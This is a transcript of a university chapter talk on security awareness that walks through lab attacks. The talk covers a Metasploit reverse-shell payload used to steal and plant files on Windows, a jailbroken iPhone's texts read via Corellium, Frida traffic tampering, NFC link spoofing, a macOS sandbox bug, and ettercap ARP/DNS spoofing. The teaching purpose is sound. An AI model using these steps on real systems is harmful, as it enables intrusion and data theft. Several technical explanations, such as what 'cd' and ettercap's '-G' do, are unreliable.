Okay, hello everyone. My name is David Mannix. I am an Associate Vice President of the LU Tech and Innovation Chapter. I'm here with Skylar Brown today, and Skylar is going to be talking to us about cybersecurity. Skylar, why don't you take it away?
Thank you, David, for that introduction. Hello, everyone. I'm really excited to share with you the world of cybersecurity and how to keep your devices safe. This session is going to be a session where we explore the different types of devices that can be exploited, as well as how they can be exploited, so that we can be better aware of how to protect our devices and our personal data. My name is Skylar. I graduated from Liberty University Online with my master's in cybersecurity, and I'm a current graduate student in a Doctor of Strategic Leadership program at LUO as well. I found it amazing that this morning when I was spending time with Jesus, I came across this video for my devotions. And those of you who have been on YouTube during the pandemic listening to worship music may find this video familiar. It's by Dappy T. Keys, and it's called Alone with God, 3-hour piano worship music. And what's really amazing is in this video is Psalm 91, and the very first 4 verses of the whole video have so much to do with cybersecurity. So let's unpack this. Psalm 91 verse 1 says, "He who dwells in the secret place of the Most High shall abide under the shadow of the Almighty." We know that cybersecurity involves uncovering a lot of secrets. Right. Psalm 91 verse 2 says, "I will say of the Lord, He is my refuge and my fortress, my God, in Him I will trust." This is amazing that in the Bible we get this amazing imagery of cybersecurity and staying safe, my refuge and my fortress, and then it goes on to talk about attacks. Verses 3 through 4 says, "Surely He shall deliver you from the snare of the fowler, and from the perilous pestilence. He shall cover you with His feathers, and under His wings you shall take refuge. His truth shall be your shield and buckler." So this is an amazing reminder that the truth always gets revealed in the end. Let's pray. Dear Jesus, we thank you for who you are. We thank you that you are God. We worship you. We ask your blessing upon this time. We thank you how in Psalm 91, verses 1 through 4, you show us that you shelter us, you take care of us. And even though there are a lot of attacks that go on in our world, and we need to know what those are, we thank you that you protect us and that in the end truth prevails. Please bless us now as we study this together. In Jesus' name, amen. Alright, so I'm really looking forward to sharing with you today 3 different areas in which we can all benefit from cybersecurity. Firstly, Windows devices. We all love Windows. Windows is it's a very popular operating system for computers. And so we understand that with a popular operating system come more risks. So we're going to take a look at the risks that malicious programs pose to Windows users as well as networking users, because chances are if you're a Windows user, you're also a networking user. We're also going to be taking a look at iPhone security, and in the middle there you see Cydia. By the way, on the left is Metasploit, so we'll go over that. Middle is Cydia, and Cydia is an alternative app store that lets you install alternative apps, possibly some malicious. So we're going to be looking at the risks that insecure apps pose to iPhone users. And lastly, that third icon on the right there is Xcode for Mac. So if you've ever created iPhone apps or even Mac apps, you know what Xcode is. And Xcode will help us see the risks that sandboxing vulnerabilities pose to current Mac users. And this is a 0-day that currently affects Ventura 13.5.1. So we're going to go across all of these operating systems here. And to get started, I'll show you a screenshot that might look familiar. Have any of you seen this screenshot before? Might look familiar. Maybe you accidentally downloaded Flash from one of these screenshots and not knowing that this type of looking website is actually malware. So when you click on download Flash, which these buttons look very nicely designed, They are round, so you think, okay, well, Mac buttons are round. This looks like a genuine pop-up. But later you find out that it isn't a pop-up, that is just an inline image that really looks like a pop-up inside of a website, and you're left with a hacked device. So this is an extremely common malware site that a lot of people experienced during the pandemic. We're going to be taking a look at Metasploit within Kali Linux to simulate a malware attack. So Kali Linux, released in 2013 by Offensive Security as an open source operating system, is used for digital forensics and penetration testing. So really getting into a device to see sensitive data, even when the device didn't authorize it. This is done by finding the vulnerabilities of a device, and if you want vulnerabilities of a specific device, you can look up CVE vulnerabilities lists online. But we already know what vulnerability we'll be using for Windows 2008 Server, and we're going to be using Metasploit, which was released 10 years before Kali Linux by Rapid7. So Offensive Security and Rapid7, together they created these amazing tools that work really well. And Metasploit will show us how easy it is to exploit an operating system's weakness in order to send and retrieve files without the user's knowledge or permission. At this time, I'm going to launch my Kali Linux machine because it takes some time to load. This will save us time when it's ready. Before we jump into the lab, we first want to take a look at one of the lines of code that's the longest line of code we will use in this particular lab, but this gives us a lot of information as to how to create an exploit attack. An exploit attack that has a payload, so that -p means payload right there. And MSF Venom means Metasploit Framework Venom, and it's a command line instance of Metasploit. So if you've ever used Terminal for Mac or PowerShell for Windows, you know what the command line is. It gives us payload options into another computer. Windows Meterpreter Reverse TCP is the next part of this line, and Reverse TCP means that the attacker is making the host initiate the connection to the attacker's PC. So it's not so much that the attacker is directly attacking the Windows computer. This is a common misconception. We think about attacks like this all the time. But a lot of attacks actually happen from the attacker convincing the victim into thinking that they need to obey what the attacker commands. So this is a reverse TCP attack. The attacker's IP is here, so not the victim's IP. This is going to be the Linux box's IP, not the Windows machine that we are attacking. And the L port, 4444. -f means file extension, and for you Windows users, you understand what exe means. It means executable file or program. And so MSF console is to launch the Metasploit framework console. And these lines of codes we will also use. Remember that in all of these lines of code, the one thing to pay attention to is the listener in use exploit multi-handler. And when we're setting the payload again, and all of these look very familiar from the slide before, we are telling the victim computer to obey every command that we please as the hacker. Right? And important Linux commands to know here are pwd, which stands for not password. If you ever get asked that in a test, it's actually print working directory. Okay, so that's what pwd is. ls stands for list, and cd stands for open. Okay, so let's do this. Have the lab all set up. It's now started up. And we're going to log in with credentials on the right side. And the first step is to open a terminal within Kali Linux, which is open source, so you can install it yourself as well. But we're going to run in order the slide that I projected previously. MSF Venom, payload, reverse TCP. The L host is our Linux box, 192.168.1.103. So it is not the Windows machine that we're attacking first, but rather we are telling the Windows machine to connect to us. That's how we have to view this. And the L port is the same as I mentioned earlier. -F is -F, which is file, exe, executable, greater than sign, and this points. This is an arrow pointing to met rev tcp 4444.exe, which if you look at CVE vulnerabilities online, this is a vulnerability for Windows 2008 server. So let's enter that in. And once it runs, we should be able to see the payload's size. So the payload is what we're sending to the Windows machine to open that port so that we can tell it to connect to us. Great. So now that we have that underway, let's type MSF console, Metasploit Framework console. And it's starting the Metasploit Framework console as we see over here. This nice animation with these capital letters moving shows us that it's loading. And it's here. So now that we know that the payload has been created, we could upload it to a website, have that website show some malicious phishing page, and then that page could get some user data as well as let them download this malicious payload. But since this is illegal to upload on the internet, we will be using something called PwnDrop. And to do that, we can go to Firefox within Kali Linux and open PwnDrop. The PwnDrop server is already set up, so we'll go to 127.0.0.1 or Apache and go to PwnDrop and log in. And we're going to upload that malicious file that we created just a few seconds ago. Let's press open. If it doesn't show up right away, you can press open again, and sure enough, it's there. So now what we want to do is we want to go back to the terminal, which I minimized right here, and run the following in order. We need that listener, right? To listen to the Windows machine, use exploit multi-handler. Right now it's using the handler, and we'll set the payload to be Windows interpreter reverse TCP. Okay, now set the L host to be the Linux box, and L port is 4444, and let's go ahead and exploit. Alright, so it started the handler. Now it will be listening for this vulnerability. You can log in to Windows, and we'll close this. Now what we want to do is we want to go to Internet Explorer, and that's okay, we'll just close any pop-up. We want to go to the PwnDrop server that we set up earlier. Instead of 127, since we're not on the Linux machine to connect through Apache, we're actually going to connect through the IP address of the Linux machine. Okay, and there's some problem rendering pages on Internet Explorer. It's because Internet Explorer is pretty old, so I'm going to go to Google Chrome instead to load this up. Great. And now we're logging in, and we successfully see this file here, and we're going to want to copy that link. And this is where Internet Explorer comes in handy, because you can actually press save and tell it where you want to save it. So I'm going to save it to the desktop, and now let's close all of these. Right. I'll close that because that was from earlier, and now we can run this payload as administrator. This is the malicious file, that executable that will let our Linux box have access to the Windows system through in order to tell the Windows system to listen to us. So now that we've run that, let's pretend that this is a computer that we have some secret information. Let me say my credit card number is 100, 100, 100, 101. Okay, and I save that to the desktop as secret.txt, and I'll press save. And sure enough, it's on the desktop now. So now we will go back to the Kali machine. All right. And we will go to the terminal. Now let's run the following in order. Get UID. Right, so we can see that the username is administrator. Let's take a look at some system information. We see Windows 2008 R2 server on Service Pack 1. Architectures x86. ls to list the different files on the desktop. And sure enough, we see secret.txt. So let's download that credit card data. And I'm going to rename it as 103 secret file.txt, being mnemonic so that we remember why we named it that. It's because it's on the Linux box whose IP address ends in 103. All right. So now that that's entered, let's open a new terminal window now that we have that secret.txt. Let's print the working directory and see if we can see the secret file there. Let's list it. And sure enough, we see the secret file right here. All right, so now that we have the secret file of the Windows machine, let's upload a file ourselves to the Windows machine called hacked.txt. And every cybercriminal loves to tell the victim you've been hacked. So let's make a text editor file saying exactly that. You've been hacked. And I have your credit card info too. Smiley face. All right. Let's save that as hacked.txt. We're saving it to the root of Kali. And let's go back to the original terminal window that we had at the beginning. And let's upload hacked.txt as hacked.txt. We're not changing the file name this time. And let's see if it's there. And sure enough, it's there on the desktop of the Windows machine. All right, really scary. So now on the Windows machine, not only do we have a message saying we've been hacked, and they also have our credit card info too, but we ran this program earlier giving the Linux machine plenty of options to exploit data further into Windows, doing some really bad things, potentially even installing a rootkit, which would be undetectable to antivirus software. So that's an example of how Windows machine can be attacked. And at this time, I'm going to launch Corellium, which has my iPhone X virtualized in the cloud. And let's talk about iPhone security. Now that we've dealt with Windows security, let's talk about the risks involved with iPhones. So we know how hackers hack Windows PCs, and that's through Metasploit, and that's through MSF Venom, and Meterpreter, all of these tools that I stated earlier. So iPhones work a little different because they run software that's proprietary to Apple. It's very hard to jailbreak an iPhone. In fact, that's why I set a reminder for myself in the previous slide to start the jailbreaking process because it takes so long. And so right now Corellium is working on jailbreaking my iPhone X. And I'll just show you all what that looks like. And right now we don't see any text in the console, but sure enough, soon there's going to be so much text flying past this page, and we'll probably see that a bit later as I explain what we're going to do to the iPhone. But first, let's take a look at Jay Freeman. He's the creator of Cydia. So if you've ever heard of Cydia, it might be because in 2008, or 2010, 2013, you used it to maybe download some music for free or get some videos or even some apps that weren't on the App Store that you wanted on your phone. That would be Cydia's use. And so insecure apps can cause a huge consequence for jailbroken devices. They can be very serious and cause lots of damage, but Cydia and jailbreaking can be used for penetration testing and seeing just how secure the iPhone is. There are some amazing apps on Cydia that let you exploit the iPhone's hardware, and jailbreaking lets you see sensitive data that you wouldn't otherwise have seen that, when in transit, can be grabbed by a cybercriminal. This is the co-founder of Corellium, the web software that I used to start up the jailbreaking process on the iPhone X. Her name is Amanda Gorton, and she and Chris Wade created Corellium. So if Chris's name sounds familiar, it's because it is. Jailbreak.me 4.0 was created in 2017 by Chris. But Chris has no picture on the internet, so we have to use Amanda's picture to represent them both. They founded Corellium in 2017. It lets you run iOS virtualized. So Apple sued them recently, but they won because it was a copyright infringement case and they were able to claim that it's fair use. This is amazing because iOS app testing is so important. Insecure apps pose a huge threat to iPhone users because iPhones can be jailbroken, and Corellium's even shown us that some of the latest iPhones can be jailbroken as well, all the way up to the 14 Pro Max. For this example, we will be using the iPhone X because it runs Cydia, it runs Corellium Cafe, it runs all of these useful tools, and soon Corellium will have exploits available more widely for newer iPhones. But for now, we're going to use the iPhone that works the best, just like we use the Windows machine that works the best, to show us how exploits happen so that when we have the tools and the knowledge needed to exploit newer systems, we can. And zero-day vulnerabilities exist, as we will see later in the macOS Ventura example. Alright, so I will go ahead and keep you all updated on the process of the jailbroken iPhone. Okay, so take a look at all of this text over here. We have so much text within the console, and it's really amazing to see all of these examples on just what vulnerabilities exist. We have firmware update kext. Kext, you might recognize that term as a kernel term, and the kernel is what runs at the root level of the operating system. It's what communicates between the software and the hardware of the phone. Apple USB device, Corellium has some really useful features, such as you can take a backup of an iPhone and upload it onto Corellium, and that backup can be exploited as well. So you don't need a Celebrite or a hardware device to physically attack an iPhone. If you just have a Chromebook, chances are you can attack an iPhone using Corellium. So port lightning, we have a lot going on here. Now I will press on the screen once to see what happens, and we see SMC, just like there's SMC reset if you've ever had to do that for your MacBook. This is an amazing library, and we will be using the network files. There's also something called Frida, which is open source, and basically it's an interaction tool that lets us grab text from the iPhone while it's in transit and changes it, which can be very dangerous for an iPhone user who thinks that they're typing one thing into the address bar of a website or a search, but they're actually yielding another result, and this can be very inducive to man-in-the-middle attacks, as I mentioned in the cover slide of the presentation advert. And so it just takes a little while to start up. But while that's starting up, let me show you. Oh, okay, I might show you that later if this. Yeah, this finally started up. Great. So I'll show you what app signing is later. App signing is really cool as well. Basically, what app signing lets you do is it lets you sign apps that wouldn't normally run on a physical iPhone. Uh, you know what? If this is starting up, I'll show you that later. And Apple requires that apps be signed if you're using a physical iPhone that's not jailbroken, so I'll show you the app signing feature as well. But now that we're on an iPhone that's jailbroken, let's take a look at this. So this is really cool because even though the App Store, I bet it won't work. Yeah, App Store is not supported on Corellium devices, right? So it won't work just because that would be very confusing for Apple to figure out, what type of iPhone is this? It's a virtual iPhone. Where did they get it from? Because Apple wants to know all of that when you're getting apps. So let's use Jay Freeman's Cydia to get an app. And this app will be called Filesa. And this app you may have heard of. It's Filesa File Manager if you're into jailbreak. What this app does is this app lets you see the file system of your iPhone on the phone. And we're not talking about the Files app, that Apple made. That's very limited in what you can see. You can only see documents, and you can see maybe some pages that you created. But when we use Filesa, we can see all of the files straight from var. So var is in root, and var is responsible for a ton of files. If you wanted to go to mobile, library, and then SMS, you just have to scroll a little bit to find it. Yeah, there we go. SMS. You can see sms.db, which is a text. And this is really, think about if you had somebody say, maybe Chase, send you a text. This is a verification code from Chase. Do not share. Have you ever received a code like that onto your phone? Well, now, once you have that code, it would show up here as a text, and we see that on iMessage, right? And we can even open it and see it, and we think that it's just private, and I'll just close that from Apple. We think that it's just a text that only we can see. But if somebody has jailbreak access to the phone, they have root access, so they can see sms.database, and they could see all of the texts that you had on the iPhone. And we see the message over there, right? This is a verification code from Chase. This can be very dangerous to an unsuspecting iPhone user who doesn't know that an attacker has connected to their device. So that's a really cool feature of Filesa. And also, by the way, within Corellium, you could also see all these files as well. It's just easier to see on the phone because Filesa has a way of viewing database files natively, which is really nice. Right? So let's go to the Corellium Cafe. And let's click Order. I want to order a coffee. So let me add that to the cart. And let's start monitoring the network and see what happens. When I check this out, Skylar Brown, my credit card is that. And I'm just going to put a bunch of arbitrary, what did we get here? I always want to see what's happening just in case. Okay, that was random. So it's very possible that you'll see network data that has nothing to do with the order that you placed. But now I see Corellium Cafe, and oh no, the credit card number is there. We have a problem, Houston. So make sure that when you're using a jailbroken phone, make sure that, firstly, that only you have access to the network, you have to really look hard if you have a jailbroken phone, and it requires so much work that I wouldn't even want to do it, to make sure and see. We have all these services connecting to, this is why I wanted to start this early, because now you have all these services connecting, and it can be even harder to find where the sensitive data is. Right, so it's really important that if you like jailbreaking and you want to use your device jailbroken, that you make sure that you can see what apps are running and what information is traveling. And you can connect your phone to computer to use some tools to see running services. The console is great, but it's really hard to read, and it has more to do with the boot process. Network's great, but again, you'll just have to look at different information. You could create a whole snapshot and assess it later. And if you're worried about whether your device is jailbroken or not, there's actually a really neat tool. And what's nice about Corellium is I can install an app that wasn't natively on the phone. And this app is called Miriam Beta 4.0. I'm going to install it right here. And it might not install, it might install. It depends on really how Corellium feels. Okay, great, Corellium is working today. I was just doing this whole recording earlier, and it just was not working, and so I actually had to re-record this entire session, but thankfully it does work. So if I click on Challenges, Jailbreak Detection, and now it will tell you whether or not the device is jailbroken. The only problem is that in order to open this app without jailbreaking, you need to sideload it. So in order to even see if your device is jailbroken, and if you can't get the device, it's a fair chance that if you can't get the device that it's not jailbroken. But just to be sure, you can run Miriam 4.0 on your native device using a sideloader. Well, what if the app isn't certified though? And this is not certified. There's no certificate that will work. However, I bought an Apple developer account for $99. It's for every year. And what you can do is you can upload the IPA right here and sign it yourself as if it was going on the App Store. Now, Apple would never allow this on the App Store, but the purpose of signing it is so that you could sideload it to your physical phone so that it will run. So that's just a demonstration. I'm not going to pull out the physical phone because I only have my computer screen to show you right now, and this is the easiest way to show an iOS device as well. By the way, every time you place an order on Corellium Cafe, if you go to VAR, which VAR we said was the very popular way. We're already in VAR. Excellent. So now we'll go to Mobile, Containers, Data, Application, and sort by last modified, and we'll quickly make an order. Hot cocoa. 1 hot cocoa, please. Checkout. I just want to put some arbitrary data. Phone number it wants. Okay. You know what? It wants a number here, so I'll just put 123, 123, 123, and place order. Now, if we sort by date modified, this is 6 p.m., and we can see now that that would be the file that contains the order information. Okay, so you could look at that and go into that later. Let me show you a really cool feature of Corellium, specifically Frida. So Frida is an open source method by which you can see data in transit and manipulate data. This is called runtime manipulation. So we opened up Frida, and we're going to click on scripts, and there's an example script already here called hookobject.js. Right? So we're going to click on the 3 dots over here and click edit. And now this script, what it will do is it'll turn, anytime we type Star Wars, it'll turn that into, these are not the droids you're looking for. So that's pretty funny, right? So we'll close that and can't wait to see that in action. But now we need to launch Safari. So we'll swipe up like we do on our own phones to go to Safari. And once Safari is open, we'll click on Console. Great. And I'll close this because I already had this open from earlier, but I want to show you how it works. Console. Okay. Gonna click Select a Process and type Safari. All right, and attach. Okay. Now we're gonna go to Scripts, and now click Execute. Now go back to the console. Are you sure you want to load a new script and disregard all current state? Put a lowercase y and enter. Did I press enter? Maybe I didn't press it hard enough. There we go. All right. And now let's see if it works. I don't know if I have to press execute again. Let's test it. Let's see. Oh, it's connected to the internet, which is really interesting. But did you see that? I typed in Star Wars. It says, these are not the droids you are looking for. That is so scary, right? How we type one thing in and press enter, and it brings us to another. It is completely crazy. Wow. So this is an example of this type of attack, runtime manipulation, and it's really scary to see runtime manipulation in action because it is just such a terrible vulnerability. Imagine you're typing to your friend, or you're typing to go on a website to chat your friend, and that website is actually, you're going to a different website not even knowing it, and there's a man-in-the-middle attack. As I suggested earlier, that could absolutely happen. And one of the neat things about Corellium is SSH access as well. You can SSH access from your own computer. And now I'm going to talk about credit card security. So now that we've spent plenty of time with Corellium, and you could even explore the different SSH options. It's really cool. It's similar to how you can jailbreak your own iPhone locally on your computer, but I'm not going to go over all of that now. It involves some VPN, and I want to use my physical network right now to demonstrate, and I'll go over this file in a second, but I want to demonstrate on my local network, so don't want to mess it up with any VPN. This is my iPhone that's physical. It's next to me, it's over here, and I can control it from a computer because it is jailbroken. It's not an iPhone X, it's an iPhone SE, but what's really fascinating is this app called NFC Writer. And what this does is it lets you emulate an NFC tag. So it makes nearby devices think that you have an NFC tag. But what's really interesting is you can choose the message, and I got this app for just under $4. You can change the record to be maliciousLink.com or whatever you want. Whateveryouwant.com. All right, so we're going to assign, and then when we start the tag emulation, it's active. So you won't be able to see it because this is on another iPhone that's not jailbroken, but when I move the iPhone near this iPhone, what's really cool is there's right now, it just popped up website NFC tag open maliciousLink.com in Safari. So this is really the science behind how credit card hacking can occur. This used the NFC chip in iPhone when iPhone wasn't even allowing, the iOS inside of iPhone wasn't even allowing the NFC chip for anything but Apple Pay. And since the jailbreak community created Apple Pay before it was released on the App Store, it was released on Cydia first, because the jailbreak community can manipulate the chip inside the phone to do whatever it wants. So instead of an NFC reader, could be an NFC writer, you can have a credit card reader when normally Apple would only allow you to write to the Verifone when you're checking out at a store saying I'm paying for this. You could actually steal somebody else's card information instead. So that's where card theft comes into play. Right? And I'm going to drag this back up here. All right. Now I'm going to launch the Kali Linux machine on my monitor, because I have another lab that requires some startup time. So I will start that up. Now let's talk about sandboxing. We talk about iOS app and signing apps and sideloading and exploiting and all of this fun stuff with Corellium. What I want to do right now, though, is delve into the world of sandboxing. And what's really crazy about macOS Ventura 13.5.1, the version that I'm on currently, is that it's vulnerable, and that there's a 0-day vulnerability that somebody tried to bring to Apple. Apple did not want to spend time fixing it, so this person in response uploaded the vulnerability information to the public internet. And you might be thinking, why would they do that? They're going to get in so much trouble. Apple's going to get hacked a ton. But really, if vulnerabilities aren't brought to the light, and if companies are trying to keep them in the dark, sometimes the best thing to do in order to kill that vulnerability is to bring it to the light. So this is the app management vulnerability in macOS Ventura. What sandboxing is, and you see the picture over there, is there are these bugs and there are these worms, right? And there are these 3 guys on laptops on the sandbox. And so that's a cute picture. What sandboxing is it prevents an app, in this case a macOS app, from touching non-sandboxed areas without the operating system's permission. That is in the usual case. So sandboxed apps are nested under a parent app, and if they are, they should not be able to overwrite data without macOS's permission. So I'm just specifically talking about macOS here, and not all sandboxed apps are inside of a non-sandboxed, but in this case it is. Really, this is how iPhone file systems work as well. You have different p-lists, and you could look at that in Filesa or in Corellium and see the different p-lists that are responsible for certain files. When you go on Facebook on your iPhone, it should only be able to communicate with other Facebook apps, such as Messenger and WhatsApp, and maybe you could be automatically logged into Instagram. But if you open up a malicious app, that malicious app should not be able to access the Meta sandbox, which is Facebook, Instagram, and all related companies. So, unfortunately, macOS Ventura 13.5.1 has a sandbox vulnerability that exploits the app management bug. And this Xcode project that was created and published to the internet, so that Apple fixes this already, is called App Management Bug. And we see App Management Bug and App Management Helper. And what's really funny is I thought at first that this sandboxed app inside of a non-sandboxed, I thought that this didn't work, but it does. The sandboxed app inside of the non-sandboxed can actually, and I'm already running this, so I'm going to run it again. This can replace a file, and if you know the app management feature in macOS Ventura, you know that an app is not supposed to be able to replace a file without sending a message to your macOS system asking if you want the app to make changes to the file system. Well, because this is a sandboxed app inside of a non-sandbox, it's tricking macOS into thinking that the app does have permission. So we're going to take this non-important RTF, we're going to drag it in here, and click Modify. And it looks like nothing happened, but you can see right now that that app icon changed. And so if you try to, see it's 25 bytes. Doesn't look the same as it used to. It now has this picture here and says it can't be opened. So now the file is corrupted. So this is a very bad vulnerability. This could lead to a lot of ransomware for Mac, and it just runs. It doesn't ask your system if it allows it or anything. So this is a very serious bug that exists in the modern day. Right? And I'm going to drag this back here. Last but not least is DNS cache poisoning. So here we get to a really, really fun demonstration of how phishing attacks can occur on public Wi-Fi networks or on public local networks, if you wish. And when you connect to a Wi-Fi network, let's say, and if you go to a domain like liberty.edu, you expect to actually be led to liberty.edu, right? It would be crazy if you weren't led to liberty.edu, and if instead you were led to a malicious site, right? Imagine if you were paying for your tuition on a site that wasn't liberty.edu. That would be very dangerous. Okay, so thankfully a lot of browsers these days have security, and it would be really hard to replicate a certificate, but it is possible to replicate a certificate. You could make a certificate, and it could be a chance as to whether or not the browser establishes a connection, but more than likely you'll always get a warning, because when you log on to a site that you've never logged onto before, the lock isn't green, it is yellow on Chrome. And I know that different browsers have different ways of doing this. And on the operating system that we're trying out, it might not be exactly the same as we're used to on our own operating systems, but each operating system has its little ways of knowing that there is something wrong. So we might see a glimpse of that. Let's get to DNS cache poisoning. And to do this, we'll be using something called ARP poisoning. And it looks like that I just got logged out of CBT Nuggets, which Corellium is the virtualizer for the iPhone in the same way that CBT Nuggets utilizes Lab on Demand. And if this software looks very familiar, it's because it is. If you are a cybersecurity master's student at Liberty University Online, you'll recognize that Lab on Demand. We use that in classes as well. All right, so let's log in to the Linux machine, and let's open two terminal windows. So I'll open the terminal right here, and File, New Window, open another one, snap one to the left, one to the right. I'm going to type sudo su. So sudo su literally means give me the authority, sudo, to su, to switch the user. And we're switching the user to what? We're switching it to root. So I need to type the root password right there. And the same thing for the left side, root password right there. All right, now let's go to the right side and type in sysctl -w net.ipv4.ip forward equals 1. And what this is saying is it's setting up a network adapter. -w means to write. Okay, so it's sysctl has to do with modifying the kernel system, which is like the operating system's container. Okay, and now -w means to write. It's writing to the network adapter, net, to forward packets as a router would. So we have the forward right there. Okay, using Internet Protocol version 4, IPv4. Okay, so now that that forwarding is there, we're going to type in nano, etc., ettercap, eder.dns. And ettercap is this tool that lets us set the A record for the domain name system. So we go down here and we're going to type www dot, and make sure that that's all lowercase, .edu. Okay, A 192.168.1.101. So we're telling liberty.edu to be our very own Metasploit IP address. Okay, we're going to boot wildcard.liberty.edu, a record 192.168.1.101, and let's save our work. So Control X, Y, enter. It's saved. And the goal is to spoof liberty.edu. Now in the other terminal window, let's type ettercap -G. This means launch ettercap, which is the tool that we'll be using for the ARP poisoning, which stands for Address Resolution Protocol Poisoning. It'll poison the cache of the DNS of the router into thinking that, once again, the victim needs to connect to the attacker. -G means set supplementary groups, G for groups, that it needs to run. So let's press enter, and the GUI should pop up, Graphical User Interface. We're just going to press check mark because everything is as it should be. Right, and now let's go to the network rack. Let's see what devices we have by clicking on the 3 dots, hosts, scan for hosts. Okay, so 100 is Windows, 101 is us. We know that because of the terminal command we wrote earlier. So, and the top is the default gateway, which is usually .1.1. In most routers, you'll see that. So we're going to set the Windows machine to be the first target, because we want to communicate with the Windows machine, to ignore, or rather to listen to the router's command to ignore itself. So add to target 2. Router's going to tell the Windows machine, don't listen to me, instead go here. It's going to say, listen to me, don't listen to me, go here. So that's what it's saying. So that makes sense. Then we're going to click on the globe icon and start the ARP poisoning. ARP poisoning and optional parameters sniff. Yep, that's fine. So let's press OK. Okay, so ARP poisoning is now in effect. And now we're going to click on the 3 dots, plugins, manage plugins, and we're going to right click on DNS spoof and activate it. All right, here comes the fun part. Let's go to our Windows machine and log in. And let's see, I'm curious how Google Chrome handles this. Let's open up Google Chrome. I'm going to open it up right here. All right, let's go to www.liberty.edu. Ooh, okay. And this is what I was talking about when it says not secure. So as a cyber criminal, what they could do is they could change it to be secure by having their own certificate. But then what would happen is, and by the way, this is the real internet. If we go to apple.com, it'll actually work. So we're on the internet here, and it still went to liberty.edu, went to Metasploitable 2 instead. And that's because of the ARP poisoning that we set up and the DNS cache. So really, a cybercriminal could create a certificate, but then this lock over here is what I'm calling this lock, which is not a lock now, but it would be if you were on a protected site with a certificate. The certificate just protects the data in transit. It doesn't actually protect the identity of the site. So you would be seeing a yellow lock instead of a green one if you're visiting this page for the first time. Now the problem is, if you've never visited liberty.edu at all, it would be very hard to convince the browser that that is not Liberty otherwise. So if you visit it enough times, and if it is still the Metasploitable 2, and if the cyber criminal created a certificate, you would see that lock turning green, especially if the cyber criminal is crafty in terms of how it signs its certificates. Right? So that's it. Thank you so much for watching this session, and I pray you all have a blessed day.
So in my professional life, I'm very cybersecurity conscious. And then I think in certain parts of my life, I can also be very aware of, security and things. But as even as you started, like when you were showing those verses at the beginning and seeing security and fortress and, things, you seem to me to be somebody that really is seeing it everywhere. Like you're seeing, you're seeing this world everywhere. And I think I sometimes compartmentalize things, and I certainly know people who act like they're invulnerable, and that cybersecurity, that's this complex thing I don't need to worry about. People are protecting me. People are, the companies are doing the right thing and taking care of me, and they sort of don't need to get into it. But I hope that this helps to open people's eyes to see the possibilities. I mean, the things that you were trying to do there are scary, that they can even be possibly done. So it's amazing.
Thank you.
No, thank you.